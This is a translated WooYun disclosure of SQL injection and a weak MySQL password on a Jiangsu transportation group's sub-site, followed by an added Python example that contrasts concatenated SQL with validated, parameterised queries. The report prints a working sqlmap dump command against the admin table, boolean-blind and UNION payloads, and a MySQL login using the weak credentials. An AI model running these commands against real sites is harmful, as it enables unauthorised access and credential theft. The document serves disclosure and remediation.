
Vulnerability summary

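Bug ID: wooyun-2015-0152641

Title: SQL injection / weak password on a sub-site of Jiangsu Provincial Transportation Engineering Group

Vendor: CNCERT (National Internet Emergency Center)

Author: belief

Submitted: 2015-11-08 20:43

Fixed: 2016-01-11 15:32

Publicly disclosed: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 10

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org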



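Vulnerability details

Disclosure status:

2015-11-08: Details reported to the vendor; awaiting vendor handling
2015-11-19: Vendor confirmed; details visible to the vendor only
2015-11-29: Details disclosed to core white hats and experts in related fields
2015-12-09: Details disclosed to regular white hats
2015-12-19: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public

Brief description:

See title.

Details: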

sudo python sqlmap.py -u"http://**.**.**.**/news.asp?sort_name_id=345&Page=2&title=%B1%BE%D5%BE%D0%C2%CE%C5" --threads=10 --dump -Tadmin
Place: GET
Parameter: sort_name_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sort_name_id=345 AND 7781=7781&Page=2&title=%B1%BE%D5%BE%D0%C2%CE%C5
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: sort_name_id=345 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(122)&CHR(107)&CHR(106)&CHR(113)&CHR(101)&CHR(75)&CHR(83)&CHR(106)&CHR(121)&CHR(111)&CHR(122)&CHR(108)&CHR(104)&CHR(87)&CHR(113)&CHR(122)&CHR(118)&CHR(98)&CHR(113) FROM MSysAccessObjects%16&Page=2&title=%B1%BE%D5%BE%D0%C2%CE%C5
---
[15:36:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[4 tables]
+---------+
| admin |
| gl |
| product |
| sort |
+---------+
Database: Microsoft_Access_masterdb
Table: admin
[16 entries]
+----+-----------+-----------------------------+------+---------+----------------------------------+
| id | qq | mail | data | admin | password |
+----+-----------+-----------------------------+------+---------+----------------------------------+

Proof of vulnerability:


MySQL weak password
sudo mysql -h**.**.**.** -utest -ptesttest
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
+--------------------+
1 row in set (0.36 sec)

Fix:

Filtering
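
An added example, not part of the original report or the site's code, showing the concatenated query pattern that makes `sort_name_id` injectable beside a version that validates the value as an integer and binds it as a parameter. SQLite stands in for the Access back end here; the `news` table, its columns and the function names are assumptions.

```python
import sqlite3

# Constructed stand-in for the site's news table; the real schema is not on the page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, sort_name_id INTEGER, title TEXT)")
    db.executemany(
        "INSERT INTO news (sort_name_id, title) VALUES (?, ?)",
        [(345, "Site news A"), (345, "Site news B"), (346, "Other category")],
    )
    return db

def list_news_vulnerable(db, raw_sort_name_id):
    # 'Before': the raw query-string value is concatenated into the SQL text,
    # so anything after the number is parsed as SQL.
    sql = "SELECT title FROM news WHERE sort_name_id = " + raw_sort_name_id + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def parse_sort_name_id(raw):
    # Allow-list validation: the parameter must be a short run of ASCII digits.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("sort_name_id must be a positive integer")
    return int(raw)

def list_news_hardened(db, raw_sort_name_id):
    # 'After': validate first, then bind the value so it is never parsed as SQL.
    value = parse_sort_name_id(raw_sort_name_id)
    rows = db.execute("SELECT title FROM news WHERE sort_name_id = ? ORDER BY id", (value,))
    return [row[0] for row in rows]

# Boolean-based payload exactly as reported in the sqlmap output above.
REPORTED_PAYLOAD = "345 AND 7781=7781"

def demo():
    db = make_db()
    results = {
        "vulnerable_accepts_payload": list_news_vulnerable(db, REPORTED_PAYLOAD),
        "hardened_normal": list_news_hardened(db, "345"),
    }
    try:
        list_news_hardened(db, REPORTED_PAYLOAD)
        results["hardened_rejects_payload"] = False
    except ValueError:
        results["hardened_rejects_payload"] = True
    return results

if __name__ == "__main__":
    print(demo())
```

The concatenated version executes the appended condition as SQL, while the hardened version rejects the same input before any query is built.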

Copyright notice: when reposting, please credit the source belief@WooYun


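Vendor response

Vendor response:

Severity: High

Vulnerability rank: 11

Confirmed: 2015-11-19 18:12

Vendor reply:

CNVD did not directly reproduce the situation described; the report has been passed by CNCERT to the Jiangsu sub-center, which will follow up and coordinate with the organization that manages the website to handle it.

Latest status:

None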

